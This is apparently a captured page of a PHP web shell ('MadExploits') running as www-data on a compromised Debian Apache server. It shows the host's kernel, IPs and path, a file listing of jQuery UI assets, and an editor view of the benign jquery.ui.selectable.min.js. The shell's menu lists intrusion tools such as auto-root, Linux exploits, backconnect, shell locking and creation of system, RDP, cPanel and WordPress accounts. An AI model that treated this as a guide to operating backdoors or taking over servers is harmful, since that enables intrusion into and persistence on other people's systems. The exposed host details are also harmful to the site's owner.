Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.149.254.229
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
baltic /
web /
misc /
ui /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
jquery.effects.blind.min.js
871
B
-rw-r--r--
jquery.effects.bounce.min.js
1.63
KB
-rw-r--r--
jquery.effects.clip.min.js
1.04
KB
-rw-r--r--
jquery.effects.core.min.js
10.58
KB
-rw-r--r--
jquery.effects.drop.min.js
1.05
KB
-rw-r--r--
jquery.effects.explode.min.js
1.61
KB
-rw-r--r--
jquery.effects.fade.min.js
577
B
-rw-r--r--
jquery.effects.fold.min.js
1.1
KB
-rw-r--r--
jquery.effects.highlight.min.j...
914
B
-rw-r--r--
jquery.effects.pulsate.min.js
951
B
-rw-r--r--
jquery.effects.scale.min.js
3.83
KB
-rw-r--r--
jquery.effects.shake.min.js
1.11
KB
-rw-r--r--
jquery.effects.slide.min.js
1.04
KB
-rw-r--r--
jquery.effects.transfer.min.js
816
B
-rw-r--r--
jquery.ui.accordion.css
1.04
KB
-rw-r--r--
jquery.ui.accordion.min.js
8.79
KB
-rw-r--r--
jquery.ui.autocomplete.css
1.08
KB
-rw-r--r--
jquery.ui.autocomplete.min.js
8.55
KB
-rw-r--r--
jquery.ui.button.css
2.41
KB
-rw-r--r--
jquery.ui.button.min.js
6.51
KB
-rw-r--r--
jquery.ui.core.css
1.42
KB
-rw-r--r--
jquery.ui.core.min.js
4.22
KB
-rw-r--r--
jquery.ui.datepicker.css
3.95
KB
-rw-r--r--
jquery.ui.datepicker.min.js
34.79
KB
-rw-r--r--
jquery.ui.dialog.css
1.33
KB
-rw-r--r--
jquery.ui.dialog.min.js
11.25
KB
-rw-r--r--
jquery.ui.draggable.min.js
18.12
KB
-rw-r--r--
jquery.ui.droppable.min.js
5.63
KB
-rw-r--r--
jquery.ui.mouse.min.js
2.67
KB
-rw-r--r--
jquery.ui.position.min.js
3.53
KB
-rw-r--r--
jquery.ui.progressbar.css
358
B
-rw-r--r--
jquery.ui.progressbar.min.js
1.78
KB
-rw-r--r--
jquery.ui.resizable.css
1.14
KB
-rw-r--r--
jquery.ui.resizable.min.js
16.96
KB
-rw-r--r--
jquery.ui.selectable.css
323
B
-rw-r--r--
jquery.ui.selectable.min.js
4.2
KB
-rw-r--r--
jquery.ui.slider.css
1.11
KB
-rw-r--r--
jquery.ui.slider.min.js
10.08
KB
-rw-r--r--
jquery.ui.sortable.min.js
23.13
KB
-rw-r--r--
jquery.ui.tabs.css
1.35
KB
-rw-r--r--
jquery.ui.tabs.min.js
11.36
KB
-rw-r--r--
jquery.ui.theme.css
18.69
KB
-rw-r--r--
jquery.ui.widget.min.js
3.2
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : jquery.ui.selectable.min.js
/* * jQuery UI Selectable 1.8.7 * * Copyright 2010, AUTHORS.txt (http://jqueryui.com/about) * Dual licensed under the MIT or GPL Version 2 licenses. * http://jquery.org/license * * http://docs.jquery.com/UI/Selectables * * Depends: * jquery.ui.core.js * jquery.ui.mouse.js * jquery.ui.widget.js */ (function(e){e.widget("ui.selectable",e.ui.mouse,{options:{appendTo:"body",autoRefresh:true,distance:0,filter:"*",tolerance:"touch"},_create:function(){var c=this;this.element.addClass("ui-selectable");this.dragged=false;var f;this.refresh=function(){f=e(c.options.filter,c.element[0]);f.each(function(){var d=e(this),b=d.offset();e.data(this,"selectable-item",{element:this,$element:d,left:b.left,top:b.top,right:b.left+d.outerWidth(),bottom:b.top+d.outerHeight(),startselected:false,selected:d.hasClass("ui-selected"), selecting:d.hasClass("ui-selecting"),unselecting:d.hasClass("ui-unselecting")})})};this.refresh();this.selectees=f.addClass("ui-selectee");this._mouseInit();this.helper=e("<div class='ui-selectable-helper'></div>")},destroy:function(){this.selectees.removeClass("ui-selectee").removeData("selectable-item");this.element.removeClass("ui-selectable ui-selectable-disabled").removeData("selectable").unbind(".selectable");this._mouseDestroy();return this},_mouseStart:function(c){var f=this;this.opos=[c.pageX, c.pageY];if(!this.options.disabled){var d=this.options;this.selectees=e(d.filter,this.element[0]);this._trigger("start",c);e(d.appendTo).append(this.helper);this.helper.css({left:c.clientX,top:c.clientY,width:0,height:0});d.autoRefresh&&this.refresh();this.selectees.filter(".ui-selected").each(function(){var b=e.data(this,"selectable-item");b.startselected=true;if(!c.metaKey){b.$element.removeClass("ui-selected");b.selected=false;b.$element.addClass("ui-unselecting");b.unselecting=true;f._trigger("unselecting", c,{unselecting:b.element})}});e(c.target).parents().andSelf().each(function(){var b=e.data(this,"selectable-item");if(b){var g=!c.metaKey||!b.$element.hasClass("ui-selected");b.$element.removeClass(g?"ui-unselecting":"ui-selected").addClass(g?"ui-selecting":"ui-unselecting");b.unselecting=!g;b.selecting=g;(b.selected=g)?f._trigger("selecting",c,{selecting:b.element}):f._trigger("unselecting",c,{unselecting:b.element});return false}})}},_mouseDrag:function(c){var f=this;this.dragged=true;if(!this.options.disabled){var d= this.options,b=this.opos[0],g=this.opos[1],h=c.pageX,i=c.pageY;if(b>h){var j=h;h=b;b=j}if(g>i){j=i;i=g;g=j}this.helper.css({left:b,top:g,width:h-b,height:i-g});this.selectees.each(function(){var a=e.data(this,"selectable-item");if(!(!a||a.element==f.element[0])){var k=false;if(d.tolerance=="touch")k=!(a.left>h||a.right<b||a.top>i||a.bottom<g);else if(d.tolerance=="fit")k=a.left>b&&a.right<h&&a.top>g&&a.bottom<i;if(k){if(a.selected){a.$element.removeClass("ui-selected");a.selected=false}if(a.unselecting){a.$element.removeClass("ui-unselecting"); a.unselecting=false}if(!a.selecting){a.$element.addClass("ui-selecting");a.selecting=true;f._trigger("selecting",c,{selecting:a.element})}}else{if(a.selecting)if(c.metaKey&&a.startselected){a.$element.removeClass("ui-selecting");a.selecting=false;a.$element.addClass("ui-selected");a.selected=true}else{a.$element.removeClass("ui-selecting");a.selecting=false;if(a.startselected){a.$element.addClass("ui-unselecting");a.unselecting=true}f._trigger("unselecting",c,{unselecting:a.element})}if(a.selected)if(!c.metaKey&& !a.startselected){a.$element.removeClass("ui-selected");a.selected=false;a.$element.addClass("ui-unselecting");a.unselecting=true;f._trigger("unselecting",c,{unselecting:a.element})}}}});return false}},_mouseStop:function(c){var f=this;this.dragged=false;e(".ui-unselecting",this.element[0]).each(function(){var d=e.data(this,"selectable-item");d.$element.removeClass("ui-unselecting");d.unselecting=false;d.startselected=false;f._trigger("unselected",c,{unselected:d.element})});e(".ui-selecting",this.element[0]).each(function(){var d= e.data(this,"selectable-item");d.$element.removeClass("ui-selecting").addClass("ui-selected");d.selecting=false;d.selected=true;d.startselected=true;f._trigger("selected",c,{selected:d.element})});this._trigger("stop",c);this.helper.remove();return false}});e.extend(e.ui.selectable,{version:"1.8.7"})})(jQuery);
Close